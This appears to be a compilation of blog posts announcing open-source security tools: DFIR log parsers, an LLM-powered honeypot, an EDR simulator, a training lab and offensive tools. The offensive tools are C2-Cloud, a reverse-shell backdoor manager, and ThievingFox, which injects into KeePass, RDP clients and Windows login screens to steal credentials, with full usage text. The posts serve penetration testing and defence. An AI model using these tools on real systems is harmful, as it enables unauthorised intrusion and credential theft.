MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs


What is MasterParser ?

MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log for example, extract critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.


MasterParser Wallpapers

Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

Supported Logs Format

This is the list of supported log formats within the var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis. |Supported Log Formats List| | --- | | auth.log |

Feature & Log Format Requests:

If you wish to propose the addition of a new feature \ log format, kindly submit your request by creating an issue Click here to create a request

How To Use ?

How To Use - Text Guide

  1. From this GitHub repository press on "<> Code" and then press on "Download ZIP".
  2. From "MasterParser-main.zip" export the folder "MasterParser-main" to you Desktop.
  3. Open a PowerSehll terminal and navigate to the "MasterParser-main" folder.
# How to navigate to "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
  1. Now you can execute the tool, for example see the tool command menu, do this:
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
  1. To run the tool, put all your /var/log/* logs in to the 01-Logs folder, and execute the tool like this:
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
  1. That's it, enjoy the tool!

How To Use - Video Guide

https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

MasterParser Social Media Publications

Social Media Posts
1. First Tool Post
2. First Tool Story Publication By Help Net Security
3. Second Tool Story Publication By Forensic Focus
4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer


Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


Features

  1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

  2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

  3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

  4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.

Future Features

This project is actively developed, and future features may include:

  1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
  2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

Installation

The tool only requires Python 3 at the moment.

  1. step1: git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
  2. step2: cd OSTE-Web-Log-Analyzer
  3. step3: python3 WLA-cli.py

Usage

After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. simple usage example : python3 WLA-cli.py -l LogSampls/access.log -t

use -h or --help for more detailed usage examples : python3 WLA-cli.py -h

Contact

linkdin:(https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228)



ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

By: Zion3R
30 April 2024 at 12:30


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

The accompanying blog post can be found here


Installation

Linux

Rustup must be installed, follow the instructions available here : https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using :

apt install mingw-w64

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

After adding Mono repositories, Nuget can be installed using apt :

apt install nuget

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11.

Windows

Rustup must be installed, follow the instructions available here : https://rustup.rs/

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc

.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11

NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

Targets

All modules have been tested on the following Windows versions :

Windows Version
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012R2
Windows 10
Windows 11

[!CAUTION] Modules have not been tested on other version, and are expected to not work.

Application Injection Method
KeePass.exe AppDomainManager Injection
KeePassXC.exe DLL Proxying
LogonUI.exe (Windows Login Screen) COM Hijacking
consent.exe (Windows UAC Popup) COM Hijacking
mstsc.exe (Windows default RDP client) COM Hijacking
RDCMan.exe (Sysinternals' RDP client) COM Hijacking
MobaXTerm.exe (3rd party RDP client) COM Hijacking

Usage

[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules : poison, cleanup and collect.

Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications

Cleanup

For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications

Collect

For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications


Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R
29 April 2024 at 12:30


TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone [email protected]:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

πŸ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R
28 April 2024 at 12:30


CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Features

Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

Installation

To get started with CrimsonEDR, follow these steps:

  1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

⚠️ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

Usage

To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
  1. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:

Contact

For questions, feedback, or support, please reach out to me via:



Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

By: Zion3R
27 April 2024 at 16:55



Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10

Features

  • Check the status of single or multiple URLs/domains.
  • Asynchronous HTTP requests for improved performance.
  • Color-coded output for better visualization of status codes.
  • Progress bar when checking multiple URLs.
  • Save results to an output file.
  • Error handling for inaccessible URLs and invalid responses.
  • Command-line interface for easy usage.

Installation

  1. Clone the repository:

bash git clone https://github.com/your_username/status-checker.git cd status-checker

  1. Install dependencies:

bash pip install -r requirements.txt

Usage

python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
  • -d, --domain: Single domain/URL to check.
  • -l, --list: File containing a list of domains/URLs to check.
  • -o, --output: File to save the output.
  • -v, --version: Display version information.
  • -update: Update the tool.

Example:

python status_checker.py -l urls.txt -o results.txt

Preview:

License

This project is licensed under the MIT License - see the LICENSE file for details.



CSAF - Cyber Security Awareness Framework

By: Zion3R
26 April 2024 at 12:30

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


Requirements

Software

  • Docker
  • Docker-compose

Hardware

Minimum

  • 4 Core CPU
  • 10GB RAM
  • 60GB Disk free

Recommendation

  • 8 Core CPU or above
  • 16GB RAM or above
  • 100GB Disk free or above

Installation

Clone the repository

git clone https://github.com/csalab-id/csaf.git

Navigate to the project directory

cd csaf

Pull the Docker images

docker-compose --profile=all pull

Generate wazuh ssl certificate

docker-compose -f generate-indexer-certs.yml run --rm generator

For security reason you should set env like this first

export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease

Start all the containers

docker-compose --profile=all up -d

You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab

For example

docker-compose --profile=attackdefenselab up -d

Proof



Exposed Ports

An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

  • Port 6080 (Access to attack network)
  • Port 7080 (Access to defense network)
  • Port 8080 (Access to monitor network)

Example usage

Access internal network with proxy socks5

  • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
  • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
  • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

Remote ssh with ssh client

  • ssh kali@ipaddress -p 6080 (default password: attackpassword)
  • ssh kali@ipaddress -p 7080 (default password: defensepassword)
  • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

Access kali linux desktop with curl / browser

  • curl http://ipaddress:6080/vnc.html
  • curl http://ipaddress:7080/vnc.html
  • curl http://ipaddress:8080/vnc.html

Domain Access

